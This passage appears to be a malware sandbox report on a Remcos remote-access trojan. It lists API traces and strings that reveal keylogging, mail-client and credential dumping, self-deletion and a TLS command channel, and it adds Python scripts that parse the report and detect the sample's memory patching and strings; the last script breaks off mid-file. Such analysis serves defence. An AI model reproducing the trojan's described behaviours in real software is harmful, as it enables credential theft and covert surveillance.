                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2403171778-0
                                                                                                                                                                                          • Opcode ID: 71423de7ca9d65e8dae80ce09b1e3cfa118d501f7f289f97c53619bef4bf05c8
                                                                                                                                                                                          • Instruction ID: d030f1907288df46b24f68c69d121462099f90e9690cd3e0d8a8742135c6aa6c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 71423de7ca9d65e8dae80ce09b1e3cfa118d501f7f289f97c53619bef4bf05c8
                                                                                                                                                                                          • Instruction Fuzzy Hash: C9211832050B149FDB326B26CC48B17BBE5FF40726F104B19E2E615AF0CB62B811DB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%
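The function summaries above carry the values an analyst actually wants out of this report: the Remcos status strings with the edition ("4.9.4 Pro"), the "Rmc-W5UGP5" identifier and the install path under C:\Users\Public\Libraries, the %ProgramFiles%\Foxmail enumeration, and the TLS/connect error strings of the C2 client. The parser below is an added example, not part of the Joe Sandbox report or of Remcos: it reads blocks in the bullet layout used on this page ("• API ID:", "• String ID:", "• Snapshot File:", terminated by "Uniqueness Score:"), splits the "$"-joined fields, attaches behaviour labels and collects the config-like indicators. The sample input is constructed from values shown on this page; the tag names, the "Rmc-" mutex shape and the "connect"-in-API-ID heuristic are this example's own assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: three function summaries in the bullet layout of this report
# ("• API ID:", "• String ID:", "• API String ID:", "• Snapshot File:", "Uniqueness Score:").
# Values are copied from summaries on this page; the first block has no "API ID" or
# "Snapshot File" line because the page's first visible block begins mid-summary.
SAMPLE_REPORT = r"""
• String ID: | $%I64u$4.9.4 Pro$C:\Users\Public\Libraries\wkrriuhD.pif$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-W5UGP5$TLS Off$TLS On $hlight$name
• API String ID: 524882891-2597379952
Uniqueness Score: -1.00%
• API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
• String ID: )$Foxmail$ProgramFiles
• API String ID: 672098462-2938083778
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Uniqueness Score: -1.00%
• API ID: CreateEvent$ErrorLastLocalTimeconnect
• String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
• API String ID: 994465650-2151626615
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Uniqueness Score: -1.00%
"""

FIELD_RE = re.compile(r"^\s*•\s*(API ID|String ID|API String ID|Snapshot File):\s?(.*)$")
END_RE = re.compile(r"^\s*Uniqueness Score:")

# Heuristics for the strings these functions carry. The version and path shapes follow
# what the page shows ("4.9.4 Pro", "C:\Users\Public\..."); the "Rmc-" prefix for the
# mutex/ID string is an assumption generalised from the single value "Rmc-W5UGP5".
VERSION_RE = re.compile(r"^\d+\.\d+\.\d+\s+\w+$")
MUTEX_RE = re.compile(r"^Rmc-[A-Za-z0-9]+$")
WINPATH_RE = re.compile(r"^[A-Za-z]:\\")


@dataclass
class FunctionSummary:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    api_string_id: str = ""
    snapshot: str = ""
    tags: set = field(default_factory=set)


def tag_block(b):
    """Attach behaviour labels (names chosen here, not Joe Sandbox's) to one summary."""
    for s in b.strings:
        if VERSION_RE.match(s):
            b.tags.add("version_string")
        if MUTEX_RE.match(s):
            b.tags.add("rmc_mutex")
        if WINPATH_RE.match(s):
            b.tags.add("install_path")
        if s.startswith("TLS"):
            b.tags.add("tls_c2")
        if s.startswith("/stext"):
            b.tags.add("nirsoft_stext")      # NirSoft-style "/stext <file>" dump switch
    if "Foxmail" in b.strings and "ProgramFiles" in b.strings:
        b.tags.add("mail_client_enum")     # builds %ProgramFiles%\Foxmail and walks it
    # Joe Sandbox concatenates API names in the "API ID" field, so substring-match.
    if any("connect" in a for a in b.apis):
        b.tags.add("c2_connect")
    return b


def parse_blocks(text):
    """Split report text into FunctionSummary objects, one per 'Uniqueness Score' terminator."""
    blocks, cur = [], FunctionSummary()
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            key, val = m.group(1), m.group(2)
            if key == "API ID":
                cur.apis = [a.strip() for a in val.split("$") if a.strip()]
            elif key == "String ID":
                cur.strings = [s.strip() for s in val.split("$") if s.strip()]
            elif key == "API String ID":
                cur.api_string_id = val.strip()
            else:
                cur.snapshot = val.strip()
        elif END_RE.match(line):
            blocks.append(tag_block(cur))
            cur = FunctionSummary()
    if cur.apis or cur.strings:          # tolerate a final block with no terminator
        blocks.append(tag_block(cur))
    return blocks


def extract_iocs(blocks):
    """Collect the config-like values (version, mutex/ID, install paths) across all blocks."""
    iocs = {"version": None, "mutex": None, "paths": []}
    for b in blocks:
        for s in b.strings:
            if iocs["version"] is None and VERSION_RE.match(s):
                iocs["version"] = s
            if iocs["mutex"] is None and MUTEX_RE.match(s):
                iocs["mutex"] = s
            if WINPATH_RE.match(s) and s not in iocs["paths"]:
                iocs["paths"].append(s)
    return iocs


if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE_REPORT)
    for i, b in enumerate(parsed):
        print(i, b.snapshot or "<no snapshot>", sorted(b.tags))
    print(extract_iocs(parsed))
```

Run it against the full report text rather than the sample and the tags line up with the Signatures at the top of the report (TLS C2 client, mail client enumeration, NirSoft "/stext" dumping); the strings tagged "rmc_mutex", "version_string" and "install_path" are the values worth carrying into a hunt query or a memory-scan rule, since they survive unpacking and are what the community Yara rule fired on.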

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          control_flow_graph 12342ab4-1234322c (graph edge data omitted): entry block calls GetModuleFileNameW; three string-building blocks each re-polled with Sleep(10 ms); then a loop of three path checks (call 1234c485), each followed by DeleteFileW, with Sleep(500 ms) between iterations; after the loop, three calls to 12336b28 decide between a Sleep(100 ms) back-edge to the start and the exit path, which calls subcall 12334aa1 (send) before cleanup. The API list below gives the same calls with their addresses.
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 12342ACD
                                                                                                                                                                                            • Part of subcall function 1234B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,12396468,1233D20D,.vbs,?,?,?,?,?,123A52F0), ref: 1234B99F
                                                                                                                                                                                            • Part of subcall function 12348568: CloseHandle.KERNEL32(123340F5,?,?,123340F5,12395E74), ref: 1234857E
                                                                                                                                                                                            • Part of subcall function 12348568: CloseHandle.KERNEL32(12395E74,?,?,123340F5,12395E74), ref: 12348587
                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,12395E74), ref: 12342C1F
                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,12395E74,12395E74), ref: 12342CC1
                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,12395E74,12395E74,12395E74), ref: 12342D63
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,12395E74,12395E74,12395E74), ref: 12342DC5
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,12395E74,12395E74,12395E74), ref: 12342DFC
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,12395E74,12395E74,12395E74), ref: 12342E38
                                                                                                                                                                                          • Sleep.KERNEL32(000001F4,12395E74,12395E74,12395E74), ref: 12342E52
                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 12342E94
                                                                                                                                                                                            • Part of subcall function 12334AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 12334B36
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                                                          • String ID: /stext "
                                                                                                                                                                                          • API String ID: 1223786279-3856184850
                                                                                                                                                                                          • Opcode ID: 33fc395927d7b7765498312fb1a5459d5a4c0cf58126db77fa67301c76948b69
                                                                                                                                                                                          • Instruction ID: 95d19d956e4d6d91d0803fc14838d6b0fb97c4d00bbc69c54ca9b7c1a931987f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 33fc395927d7b7765498312fb1a5459d5a4c0cf58126db77fa67301c76948b69
                                                                                                                                                                                          • Instruction Fuzzy Hash: BA02023A5083818BC3BADB61D890AFFB3E5AF94301F50495DD48A971A4EF347B4AC752
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph

APIs
• __Init_thread_footer.LIBCMT ref: 1233AD38
• Sleep.KERNEL32(000001F4), ref: 1233AD43
• GetForegroundWindow.USER32 ref: 1233AD49
• GetWindowTextLengthW.USER32(00000000), ref: 1233AD52
• GetWindowTextW.USER32(00000000,00000000,00000000), ref: 1233AD86
• Sleep.KERNEL32(000003E8), ref: 1233AE54
  • Part of subcall function 1233A636: SetEvent.KERNEL32(?,?,00000000,1233B20A,00000000), ref: 1233A662
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Window$SleepText$EventForegroundInit_thread_footerLength
• String ID: [${ User has been idle for $ minutes }$]
• API String ID: 911427763-3954389425
• Opcode ID: 55813ac9ab0fcfd64e5c0a1c70216d2f10e93de2bcccfb60af696134269ce38b
• Instruction ID: fbe22665588c09f28317821c47f827504adc88afa5a837aed5a8729b1d7a8b27
• Opcode Fuzzy Hash: 55813ac9ab0fcfd64e5c0a1c70216d2f10e93de2bcccfb60af696134269ce38b
• Instruction Fuzzy Hash: 4F51C877A043415FC766D730C894ABE77EAAF84712F400A29E496C62D4EF34EB45CB52
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 1233DB9A
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: LongNamePath
• String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
• API String ID: 82841172-425784914
• Opcode ID: b5afad6cede5f5ca6f4a2708436f9422b1f84038caf4aa40d1221f8534c628a1
• Instruction ID: 2a5418260f76a4a4086be765c76efce63220d4f34903a1237a08d8776628ea59
• Opcode Fuzzy Hash: b5afad6cede5f5ca6f4a2708436f9422b1f84038caf4aa40d1221f8534c628a1
• Instruction Fuzzy Hash: 0841217B4183049AD66ADB60DD54CFEB7B8AE91352F10462EF485D2190FF20BF49CA52
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 1234BFB7: GetCurrentProcess.KERNEL32(?,?,?,1233DAAA,WinDir,00000000,00000000), ref: 1234BFC8
  • Part of subcall function 1234BFB7: IsWow64Process.KERNEL32(00000000,?,?,1233DAAA,WinDir,00000000,00000000), ref: 1234BFCF
  • Part of subcall function 123435A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 123435CA
  • Part of subcall function 123435A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 123435E7
  • Part of subcall function 123435A6: RegCloseKey.KERNEL32(?), ref: 123435F2
• StrToIntA.SHLWAPI(00000000,1239C9F8,00000000,00000000,00000000,123A50E4,00000003,Exe,00000000,0000000E,00000000,123960BC,00000003,00000000), ref: 1234B33C
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Process$CloseCurrentOpenQueryValueWow64
• String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
• API String ID: 782494840-2070987746
• Opcode ID: e57045c1431e235873436e7addf7125a8010e283022439724f39c92ab156a074
• Instruction ID: 76abe126e73331d3f4d41a46c505921bbf84db76b8aa9c8176226fa637d69988
• Opcode Fuzzy Hash: e57045c1431e235873436e7addf7125a8010e283022439724f39c92ab156a074
• Instruction Fuzzy Hash: 72115977D402841AEB65A3748C95EBE7BAD8B95310FA04664E546E31D1FE10AD02C7A1
Uniqueness
Uniqueness Score: -1.00%

APIs
• Sleep.KERNEL32(00001388), ref: 1233A740
  • Part of subcall function 1233A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,1233A74D), ref: 1233A6AB
  • Part of subcall function 1233A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,1233A74D), ref: 1233A6BA
  • Part of subcall function 1233A675: Sleep.KERNEL32(00002710,?,?,?,1233A74D), ref: 1233A6E7
  • Part of subcall function 1233A675: FindCloseChangeNotification.KERNEL32(00000000,?,?,?,1233A74D), ref: 1233A6EE
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 1233A77C
• GetFileAttributesW.KERNEL32(00000000), ref: 1233A78D
• SetFileAttributesW.KERNEL32(00000000,00000080), ref: 1233A7A4
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 1233A81E
  • Part of subcall function 1234C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,1233A843), ref: 1234C49E
• SetFileAttributesW.KERNEL32(00000000,00000006,00000013,12396468,?,00000000,00000000,00000000,00000000,00000000), ref: 1233A927
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: File$AttributesCreate$Sleep$ChangeCloseDirectoryExistsFindNotificationPathSize
• String ID:
• API String ID: 110482706-0
• Opcode ID: b9f4c87f9667a041603b3e1d5677cd9273b81eca30ce593a6668a9902283f816
• Instruction ID: 8c91335f8b69181bb213371e77e7bb55e2117847e2a2562181d45c08af6c9d57
• Opcode Fuzzy Hash: b9f4c87f9667a041603b3e1d5677cd9273b81eca30ce593a6668a9902283f816
• Instruction Fuzzy Hash: 7C51617B6043045FCBA7EB70C864ABE77A95F81316F404A1DE492972D0DF25AB0AC752
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(1464C7DD), ref: 1464C7E6
• GetModuleHandleA.KERNEL32(?,1464C7DD), ref: 1464C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 1464C860
  • Part of subcall function 1464C803: GetProcAddress.KERNEL32(00000000,1464C7F4), ref: 1464C804
  • Part of subcall function 1464C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1464C7F4,1464C7DD), ref: 1464C816
  • Part of subcall function 1464C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1464C7F4,1464C7DD), ref: 1464C82A
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
• Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction ID: c5203219aca41bac0974659d549ffa4e6adbe310fc6c9950573c30589d04d48c
• Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction Fuzzy Hash: 00012E10A466417CBF1292740C00ABA6FD89B3367CB3F1B96E2009639BD9A08102C3AA
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(?,1464C7DD), ref: 1464C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 1464C860
  • Part of subcall function 1464C7E6: GetModuleHandleA.KERNEL32(1464C7DD), ref: 1464C7E6
  • Part of subcall function 1464C7E6: GetProcAddress.KERNEL32(00000000,1464C7F4), ref: 1464C804
  • Part of subcall function 1464C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1464C7F4,1464C7DD), ref: 1464C816
  • Part of subcall function 1464C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1464C7F4,1464C7DD), ref: 1464C82A
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
• Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction ID: e544fa5d7c7215c7bca5cabc66d442ea05864200187e4b0b522e972b9f3213b1
• Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction Fuzzy Hash: 052138215096826FFF128B744C007A67FD89B33278F3F0696D140CB387D5A89445C3A6
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,1234C510,00000000,00000000,?), ref: 1234C430
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,1233A8E7,?,00000000,00000000), ref: 1234C44D
• CloseHandle.KERNEL32(00000000,?,1233A8E7,?,00000000,00000000), ref: 1234C459
• WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,1233A8E7,?,00000000,00000000), ref: 1234C46A
• FindCloseChangeNotification.KERNEL32(00000000,?,1233A8E7,?,00000000,00000000), ref: 1234C477
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
• String ID:
• API String ID: 1087594267-0
• Opcode ID: 971053353e25b6904670b38f375eb60e243dc577aaa617686b3997ad261a9cc0
• Instruction ID: 4f4be6a61cc221a60879e5af517593502eae7285e52f4a7b589323a744d1cec1
• Opcode Fuzzy Hash: 971053353e25b6904670b38f375eb60e243dc577aaa617686b3997ad261a9cc0
• Instruction Fuzzy Hash: D711E1B23452A17FE6024A249D8DEBB73DCEB82274FA04F69F191C63C1CA618C008731
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(00000000,1464C7F4), ref: 1464C804
• VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1464C7F4,1464C7DD), ref: 1464C816
• VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1464C7F4,1464C7DD), ref: 1464C82A
• GetModuleHandleA.KERNEL32(?,1464C7DD), ref: 1464C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 1464C860
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: AddressProcProtectVirtual$HandleModule
• String ID:
• API String ID: 2152742572-0
• Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
• Instruction ID: fab74682b50edfebb43a34ee3ff2b4fa14cb83d913b35c5c14fa00b6a3031982
• Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
• Instruction Fuzzy Hash: ABF0F6516466417CFF1246B40C41EF65FCC8B37678B3E1A56E200C738BD895850683FA
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateThread.KERNEL32(00000000,00000000,1233A27D,?,00000000,00000000), ref: 1233A1FE
• CreateThread.KERNEL32(00000000,00000000,1233A267,?,00000000,00000000), ref: 1233A20E
• CreateThread.KERNEL32(00000000,00000000,1233A289,?,00000000,00000000), ref: 1233A21A
  • Part of subcall function 1233B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 1233B172
  • Part of subcall function 1233B164: wsprintfW.USER32 ref: 1233B1F3
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTimewsprintf
• String ID: Offline Keylogger Started
• API String ID: 465354869-4114347211
• Opcode ID: 29a63aabea44032cd08a569a44d33f43cba53c739f154cbf2edc129cee10dd39
• Instruction ID: b59b18fdb3046b08177b5ae6337551e43faf632701e11fcb60f1a7b73eb48763
• Opcode Fuzzy Hash: 29a63aabea44032cd08a569a44d33f43cba53c739f154cbf2edc129cee10dd39
• Instruction Fuzzy Hash: B811CABB5002087EE275B7369C85CBF776DDA8129AB50061DF84642155EE216F09CAF2
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetLocalTime.KERNEL32(00000001,123A4EE0,123A5598,?,?,?,?,12345CD6,?,00000001), ref: 12334F81
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,123A4EE0,123A5598,?,?,?,?,12345CD6,?,00000001), ref: 12334FCD
• CreateThread.KERNEL32(00000000,00000000,12335150,?,00000000,00000000), ref: 12334FE0
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 12334F94
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Create$EventLocalThreadTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 2532271599-1507639952
• Opcode ID: 76611963143195156edef1685e4905481504dfdadfb6de474345d06651055905
• Instruction ID: 5a1789b492e677f5856cf55d61907449179f6bea567c30a58505ecdad4ae6492
• Opcode Fuzzy Hash: 76611963143195156edef1685e4905481504dfdadfb6de474345d06651055905
• Instruction Fuzzy Hash: B111E37A8043886EDB22A7768C0CEEF7FACDBD6311F04460EE54196251DA706645CBB2
Uniqueness
• Uniqueness Score: -1.00%

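Two things in the blocks above lend themselves to a mechanical check: the resolve-then-patch sequence in the 1464C7E6 block (GetProcAddress, VirtualProtect to PAGE_READWRITE (0x04) over 0x78 bytes, then a second VirtualProtect on the same range that puts the saved protection back, a shape typical of in-memory patching of a resolved function; the report does not show what bytes are written) and the Remcos strings the report names ("Offline Keylogger Started", "KeepAlive | Enabled | Timeout: ", and "4.9.4 Pro" from the registry block that follows). The Python below is an added example, not code from the report, from Joe Sandbox, or from the sample. It parses API lines in the report's own format, flags the patch sequence, and scans a buffer for the strings in both ASCII and UTF-16LE, since the report does not state which encoding the sample uses (the wsprintfW call suggests wide strings are present). The trace is copied from the 1464C7E6 block; the memory buffer is constructed for the example.

```python
"""Added example (not part of the Joe Sandbox report): two checks over
material exposed in the function blocks of this section."""
import re
from dataclasses import dataclass

PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40
WRITABLE = {PAGE_READWRITE, PAGE_EXECUTE_READWRITE}

# Sample input: the five API lines of the 1464C7E6 block, copied from the report.
SAMPLE_TRACE = """\
• GetProcAddress.KERNEL32(00000000,1464C7F4), ref: 1464C804
• VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1464C7F4,1464C7DD), ref: 1464C816
• VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1464C7F4,1464C7DD), ref: 1464C82A
• GetModuleHandleA.KERNEL32(?,1464C7DD), ref: 1464C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 1464C860
"""

# Strings named in this section's "String ID" fields.
REMCOS_STRINGS = ("Offline Keylogger Started", "KeepAlive | Enabled | Timeout: ", "4.9.4 Pro")

# Constructed stand-in for a memory dump: one ASCII and one wide string, padded.
# The encoding the real sample uses is an assumption; both forms are searched.
SAMPLE_BLOB = (b"\x00" * 16 + b"Offline Keylogger Started\x00"
               + "KeepAlive | Enabled | Timeout: ".encode("utf-16-le") + b"\x00" * 8)

# Report line shape: "• [Part of subcall function X: ]Api.MODULE(args), ref: ADDR"
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


@dataclass
class Call:
    api: str
    module: str
    args: list      # hex strings, or "?" where the sandbox could not recover a value
    ref: int        # return address of the call site


def parse_trace(text: str) -> list:
    """Parse report-style API lines; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            raw = m["args"].strip()
            args = [a.strip() for a in raw.split(",")] if raw else []
            calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16)))
    return calls


def _hex(arg: str):
    """Hex argument as int, or None for '?' (value not recovered)."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def find_api_patch(calls: list) -> list:
    """Flag GetProcAddress -> VirtualProtect(writable) -> VirtualProtect(restore).

    VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldProtect): the first
    call makes dwSize bytes writable; a later call with the same dwSize and a
    non-literal flNewProtect (the saved old protection) restores it. The report
    prints extra stack slots after the real parameters; only the first three
    are inspected here."""
    hits = []
    for i, c in enumerate(calls):
        if c.api != "GetProcAddress":
            continue
        j = next((k for k in range(i + 1, len(calls)) if calls[k].api == "VirtualProtect"), None)
        if j is None or len(calls[j].args) < 3 or _hex(calls[j].args[2]) not in WRITABLE:
            continue
        vp, size = calls[j], _hex(calls[j].args[1])
        for r in calls[j + 1:]:
            if (r.api == "VirtualProtect" and len(r.args) >= 3
                    and _hex(r.args[1]) == size and _hex(r.args[2]) not in WRITABLE):
                hits.append({"resolve_ref": c.ref, "protect_ref": vp.ref,
                             "restore_ref": r.ref, "patch_bytes": size})
                break
    return hits


def match_strings(blob: bytes) -> dict:
    """Map each Remcos string found to a list of (encoding, offset) pairs."""
    found = {}
    for s in REMCOS_STRINGS:
        for label, needle in (("ascii", s.encode("ascii")), ("wide", s.encode("utf-16-le"))):
            off = blob.find(needle)
            if off != -1:
                found.setdefault(s, []).append((label, off))
    return found


if __name__ == "__main__":
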